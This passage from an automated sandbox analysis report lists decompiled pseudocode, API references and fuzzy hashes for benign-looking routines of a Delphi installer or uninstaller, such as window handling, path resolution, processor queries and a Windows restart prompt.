						_t52 = E00414DA0(0, L"TWindowDisabler-Window", 0,  *0x6d2634, 0,  *_t5, 0, 0, 0, 0, 0x80000000);
						 *(_t49 + 4) = _t52;
						if(_t52 != 0) {
							ShowWindow(_t52, 8);
						}
					}
				}
				SetFocus(0);
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(E005C93E1);
				return E0040A1C8( &_v8);
			}













                                                                    0x005c92c8
                                                                    0x005c92c8
                                                                    0x005c92c9
                                                                    0x005c92cb
                                                                    0x005c92cd
                                                                    0x005c92ce
                                                                    0x005c92cf
                                                                    0x005c92d2
                                                                    0x005c92d4
                                                                    0x005c92d7
                                                                    0x005c92d7
                                                                    0x005c92de
                                                                    0x005c92e2
                                                                    0x005c92e3
                                                                    0x005c92e8
                                                                    0x005c92eb
                                                                    0x005c92f2
                                                                    0x005c92fc
                                                                    0x005c9304
                                                                    0x005c930e
                                                                    0x005c9319
                                                                    0x005c9325
                                                                    0x005c9325
                                                                    0x005c9333
                                                                    0x005c9363
                                                                    0x005c9365
                                                                    0x005c936a
                                                                    0x005c9379
                                                                    0x005c938a
                                                                    0x005c9391
                                                                    0x005c9399
                                                                    0x005c93ac
                                                                    0x005c93ae
                                                                    0x005c93b3
                                                                    0x005c93b8
                                                                    0x005c93b8
                                                                    0x005c93b3
                                                                    0x005c936a
                                                                    0x005c93bf
                                                                    0x005c93c6
                                                                    0x005c93c9
                                                                    0x005c93cc
                                                                    0x005c93d9

                                                                    APIs
                                                                    • GetActiveWindow.USER32 ref: 005C92F7
                                                                    • GetFocus.USER32 ref: 005C92FF
                                                                    • RegisterClassW.USER32 ref: 005C9320
                                                                    • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
                                                                    • SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FocusWindow$ActiveClassRegisterShow
                                                                    • String ID: TWindowDisabler-Window
                                                                    • API String ID: 495420250-1824977358
                                                                    • Opcode ID: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                                    • Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
                                                                    • Opcode Fuzzy Hash: 6784ae0ba7057f0a8a26c4c85bfb57be43722a071822028f1ce80f015718ad1f
                                                                    • Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006A5F04, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 79%
                                                                    			E006A5F04(void* __eax, void* __edx, intOrPtr _a4076) {
				char _v4120;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t6;
				void* _t11;
				signed char _t14;
				void* _t22;
				intOrPtr* _t23;
				void* _t24;
				void* _t28;
				long _t30;
				void* _t31;
				void* _t32;
				void* _t33;

				_push(__eax);
				_t6 = 2;
				do {
					_t32 = _t32 + 0xfffff004;
					_push(_t6);
					_t6 = _t6 - 1;
				} while (_t6 != 0);
				_t33 = _t32 + 4;
				_t28 = __edx;
				_t29 = _a4076;
				_t23 = E00414020(_t22, _a4076, GetModuleHandleW(L"kernel32.dll"), L"GetFinalPathNameByHandleW");
				if(_t23 == 0) {
					L11:
					_t11 = E0040A5A8(_t28, _t29);
				} else {
					_t14 = GetFileAttributesW(E0040B278(_t29));
					if(_t14 == 0xffffffff) {
						goto L11;
					} else {
						if((_t14 & 0x00000010) == 0) {
							_t30 = 0;
							__eflags = 0;
						} else {
							_t30 = 0x2000000;
						}
						_t31 = CreateFileW(E0040B278(_t29), 0, 7, 0, 3, _t30, 0);
						if(_t31 == 0xffffffff) {
							goto L11;
						} else {
							_t24 =  *_t23(_t31,  &_v4120, 0x1000, 0);
							CloseHandle(_t31);
							if(_t24 <= 0) {
								goto L11;
							} else {
								_t41 = _t24 - 0xff0;
								if(_t24 >= 0xff0) {
									goto L11;
								} else {
									_t11 = E006A5E1C(_t33, _t24, _t28, _t29, _t41);
								}
							}
						}
					}
				}
				return _t11;
			}


















                                                                    0x006a5f08
                                                                    0x006a5f09
                                                                    0x006a5f0e
                                                                    0x006a5f0e
                                                                    0x006a5f14
                                                                    0x006a5f15
                                                                    0x006a5f15
                                                                    0x006a5f1f
                                                                    0x006a5f22
                                                                    0x006a5f24
                                                                    0x006a5f3b
                                                                    0x006a5f3f
                                                                    0x006a5fad
                                                                    0x006a5fb1
                                                                    0x006a5f41
                                                                    0x006a5f49
                                                                    0x006a5f51
                                                                    0x00000000
                                                                    0x006a5f53
                                                                    0x006a5f55
                                                                    0x006a5f5e
                                                                    0x006a5f5e
                                                                    0x006a5f57
                                                                    0x006a5f57
                                                                    0x006a5f57
                                                                    0x006a5f78
                                                                    0x006a5f7d
                                                                    0x00000000
                                                                    0x006a5f7f
                                                                    0x006a5f8e
                                                                    0x006a5f91
                                                                    0x006a5f98
                                                                    0x00000000
                                                                    0x006a5f9a
                                                                    0x006a5f9a
                                                                    0x006a5fa0
                                                                    0x00000000
                                                                    0x006a5fa2
                                                                    0x006a5fa6
                                                                    0x006a5fa6
                                                                    0x006a5fa0
                                                                    0x006a5f98
                                                                    0x006a5f7d
                                                                    0x006a5f51
                                                                    0x006a5fc0

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                                    • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                                    • CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandle$AttributesCloseCreateModule
                                                                    • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                                    • API String ID: 791737717-340263132
                                                                    • Opcode ID: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                                    • Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
                                                                    • Opcode Fuzzy Hash: 63661d9c3d23cef5f130baae9d767e1c6f1063135154e27a41ef4511c69c9237
                                                                    • Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00408BB4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 36%
                                                                    			E00408BB4(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00405324();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E00406F0C(_v16);
						_push(_t41);
						_push(E00408C62);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00405324();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E00408C69);
							return E00406F28(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E004099B8();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                                    0x00408bb5
                                                                    0x00408bb7
                                                                    0x00408bbc
                                                                    0x00408bd6
                                                                    0x00408c69
                                                                    0x00408c69
                                                                    0x00000000
                                                                    0x00408bdc
                                                                    0x00408bdc
                                                                    0x00408bdf
                                                                    0x00408be0
                                                                    0x00408be2
                                                                    0x00408be9
                                                                    0x00000000
                                                                    0x00408bf5
                                                                    0x00408bfd
                                                                    0x00408c02
                                                                    0x00408c03
                                                                    0x00408c08
                                                                    0x00408c0b
                                                                    0x00408c11
                                                                    0x00408c15
                                                                    0x00408c16
                                                                    0x00408c1b
                                                                    0x00408c22
                                                                    0x00408c4c
                                                                    0x00408c4e
                                                                    0x00408c51
                                                                    0x00408c54
                                                                    0x00408c61
                                                                    0x00408c24
                                                                    0x00408c24
                                                                    0x00408c3f
                                                                    0x00408c42
                                                                    0x00408c4a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00408c4a
                                                                    0x00408c35
                                                                    0x00408c38
                                                                    0x00408c70
                                                                    0x00408c76
                                                                    0x00408c76
                                                                    0x00408c22
                                                                    0x00408be9
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
                                                                    • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                    • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                    • API String ID: 4275029093-79381301
                                                                    • Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                    • Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
                                                                    • Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                                    • Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005CE26C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 51%
                                                                    			E005CE26C(void* __eax, void* __ebx, long* __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				struct tagTEXTMETRICW _v76;
				signed int _t26;
				signed int _t27;
				void* _t36;
				intOrPtr _t43;
				long* _t45;
				signed int* _t47;
				void* _t50;

				_t37 = __ecx;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t45 = __ecx;
				_t47 = __edx;
				_t36 = __eax;
				_v8 = GetDC(0);
				_push(_t50);
				_push(0x5ce2f8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xffffffb8;
				SelectObject(_v8, E004EE238(_t36, _t36, _t37, _t45, _t47));
				GetTextExtentPointW(_v8, L"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v16);
				asm("cdq");
				_t26 = _v16.cx / 0x1a + 1;
				_t27 = _t26 >> 1;
				if(_t26 < 0) {
					asm("adc eax, 0x0");
				}
				 *_t47 = _t27;
				GetTextMetricsW(_v8,  &_v76);
				 *_t45 = _v76.tmHeight;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(E005CE2FF);
				return ReleaseDC(0, _v8);
			}













                                                                    0x005ce26c
                                                                    0x005ce272
                                                                    0x005ce273
                                                                    0x005ce274
                                                                    0x005ce275
                                                                    0x005ce277
                                                                    0x005ce279
                                                                    0x005ce282
                                                                    0x005ce287
                                                                    0x005ce288
                                                                    0x005ce28d
                                                                    0x005ce290
                                                                    0x005ce29f
                                                                    0x005ce2b3
                                                                    0x005ce2c0
                                                                    0x005ce2c3
                                                                    0x005ce2c4
                                                                    0x005ce2c6
                                                                    0x005ce2c8
                                                                    0x005ce2c8
                                                                    0x005ce2cb
                                                                    0x005ce2d5
                                                                    0x005ce2dd
                                                                    0x005ce2e1
                                                                    0x005ce2e4
                                                                    0x005ce2e7
                                                                    0x005ce2f7

                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 005CE27D
                                                                      • Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280
                                                                    • SelectObject.GDI32(00000001,00000000), ref: 005CE29F
                                                                    • GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
                                                                    • GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
                                                                    • ReleaseDC.USER32 ref: 005CE2F2
                                                                    Strings
                                                                    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Text$CriticalEnterExtentMetricsObjectPointReleaseSectionSelect
                                                                    • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                    • API String ID: 1334710084-222967699
                                                                    • Opcode ID: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                                    • Instruction ID: 68d2e7468c57547273e36bf030651d7f5f3d68c5ac32077f2b8cb66f1dd3ef54
                                                                    • Opcode Fuzzy Hash: 325bd83ac94b98e0ccaeb91b867b8168358bc3f43770baf6a1d651e33ba30b3f
                                                                    • Instruction Fuzzy Hash: 8E01847AA14204BFE704DEE9CC42F9EB7ECEB49704F510469F604E7280D678AD008724
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8141, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E006B8141(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char* _t18;
				char* _t23;
				intOrPtr* _t25;
				intOrPtr _t29;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t45;
				void* _t48;

				if( *((char*)(_t48 - 0x21)) != 0) {
					_t18 =  *0x6cdfdc; // 0x6d62e4
					if( *_t18 != 0) {
						E00616130(L"Not restarting Windows because Uninstall is being run from the debugger.", __ebx, __edi, __esi);
					} else {
						E00616130(L"Restarting Windows.", __ebx, __edi, __esi);
						_t23 =  *0x6cdefc; // 0x6d6825
						 *_t23 = 1;
						if(E0060F6D8() == 0) {
							_t25 =  *0x6cdec4; // 0x6d579c
							SetForegroundWindow( *( *_t25 + 0x188));
							_push(1);
							_push(1);
							_t29 =  *0x6cded8; // 0x6d5c28
							_t3 = _t29 + 0x164; // 0x0
							_push(E0040B278( *_t3));
							_t32 =  *0x6cded8; // 0x6d5c28
							_t4 = _t32 + 0x15c; // 0x0
							_t34 = E0040B278( *_t4);
							_pop(_t45);
							E006AF190(_t34, __ebx, 0x30, _t45, __edi, __esi);
						}
					}
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(E006B8200);
				E0040A1C8(_t48 - 0x48);
				E0040A228(_t48 - 0x3c, 5);
				_t44 =  *0x4012b8; // 0x4012bc
				E0040C024(_t48 - 0x20, 7, _t44);
				return E0040A1EC(_t48 - 4);
			}













                                                                    0x006b8145
                                                                    0x006b8147
                                                                    0x006b814f
                                                                    0x006b81b6
                                                                    0x006b8151
                                                                    0x006b8156
                                                                    0x006b815b
                                                                    0x006b8160
                                                                    0x006b816a
                                                                    0x006b816c
                                                                    0x006b817a
                                                                    0x006b817f
                                                                    0x006b8181
                                                                    0x006b8183
                                                                    0x006b8188
                                                                    0x006b8193
                                                                    0x006b8194
                                                                    0x006b8199
                                                                    0x006b819f
                                                                    0x006b81a9
                                                                    0x006b81aa
                                                                    0x006b81aa
                                                                    0x006b816a
                                                                    0x006b814f
                                                                    0x006b81bd
                                                                    0x006b81c0
                                                                    0x006b81c3
                                                                    0x006b81cb
                                                                    0x006b81d8
                                                                    0x006b81e5
                                                                    0x006b81eb
                                                                    0x006b81f8

                                                                    APIs
                                                                      • Part of subcall function 0060F6D8: GetCurrentProcess.KERNEL32(00000028), ref: 0060F6E8
                                                                      • Part of subcall function 0060F6D8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0060F6EE
                                                                    • SetForegroundWindow.USER32(?), ref: 006B817A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                    • String ID: %hm$(\m$Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.$bm
                                                                    • API String ID: 3179053593-36556386
                                                                    • Opcode ID: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                                    • Instruction ID: d1bb377931262cf507ba46983c8bd46f5a1d5c2f393bef5d4bb5aec732555b7a
                                                                    • Opcode Fuzzy Hash: b7594902ceb65011b7cd408ddb31800c32ac1c1d22a90f0235b323c67c5cc1dc
                                                                    • Instruction Fuzzy Hash: 621130746042049FD700EB69DD86FE837EAAB49304F5540BAF401AB7A2CE79AC82C759
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409E60, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 43%
                                                                    			E00409E60(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x6cf05c == 0) {
					if( *0x6c5036 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L0040529C();
					}
					return _t3;
				} else {
					if( *0x6cf348 == 0xd7b2 &&  *0x6cf350 > 0) {
						 *0x6cf360();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E0040AC70(0x409ef4);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                                    0x00409e68
                                                                    0x00409ece
                                                                    0x00409ed0
                                                                    0x00409ed2
                                                                    0x00409ed7
                                                                    0x00409edc
                                                                    0x00409ede
                                                                    0x00409ede
                                                                    0x00409ee4
                                                                    0x00409e6a
                                                                    0x00409e73
                                                                    0x00409e83
                                                                    0x00409e83
                                                                    0x00409e9f
                                                                    0x00409eb2
                                                                    0x00409ec6
                                                                    0x00409ec6

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?,0040707B), ref: 00409E99
                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409E9F
                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?,?), ref: 00409EBA
                                                                    • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00409F18,?,?), ref: 00409EC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: Error$Runtime error at 00000000
                                                                    • API String ID: 3320372497-2970929446
                                                                    • Opcode ID: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                                    • Instruction ID: a01582976990e38fcf300ac2ca1e4f1bd102d55210953f65d1fcb3aa769fb624
                                                                    • Opcode Fuzzy Hash: a4deac2aa97ac97823855fef04cac89a22f23a0563f87e50a6800a30aeefe081
                                                                    • Instruction Fuzzy Hash: 52F04FA0A44780BAEB10B7A19C07F7B261AD741B28F10567FB214B91D3C6B85CC49AE9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0043171C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E0043171C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					L00430EC8(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
